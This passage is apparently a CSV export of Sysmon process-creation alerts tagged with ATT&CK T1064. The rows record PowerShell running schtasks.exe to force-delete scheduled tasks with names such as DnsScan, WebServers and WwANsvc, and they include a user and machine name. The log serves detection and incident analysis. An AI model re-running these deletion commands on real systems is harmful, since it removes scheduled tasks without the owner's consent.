6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.667"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-001075e62100}"",""processId"":""3524"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WebServers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.137",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.590 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-001027e42100} +ProcessId: 3196 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsScan /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.606211200Z"",""eventRecordID"":""2831"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.590\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-001027e42100}\r\nProcessId: 3196\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.590"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-001027e42100}"",""processId"":""3196"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsScan /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.107",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.519 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-0010c4e12100} +ProcessId: 7872 +Image: C:\Windows\System32\schtasks.exe 
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Ddrivers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.557957700Z"",""eventRecordID"":""2830"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.519\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-0010c4e12100}\r\nProcessId: 7872\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers 
/F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.519"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-0010c4e12100}"",""processId"":""7872"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Ddrivers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 
14:19:02.087",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.456 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-001099df2100} +ProcessId: 4844 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Bluetooths /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.459341600Z"",""eventRecordID"":""2829"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.456\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-001099df2100}\r\nProcessId: 4844\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.456"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-001099df2100}"",""processId"":""4844"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Bluetooths /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.074",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.398 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-0010c6dd2100} +ProcessId: 5384 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WwANsvc /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.439400100Z"",""eventRecordID"":""2828"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.398\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-0010c6dd2100}\r\nProcessId: 5384\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.398"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-0010c6dd2100}"",""processId"":""5384"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WwANsvc /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.057",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.359 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-0010fadb2100} +ProcessId: 6504 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN MiscfostNsi /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.363998400Z"",""eventRecordID"":""2827"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.359\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-0010fadb2100}\r\nProcessId: 6504\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:32.359"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-0010fadb2100}"",""processId"":""6504"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN MiscfostNsi /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.026",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.326 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-00103dda2100} +ProcessId: 7896 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HomeGroupProvider /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.333864100Z"",""eventRecordID"":""2826"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.326\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-00103dda2100}\r\nProcessId: 7896\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: 
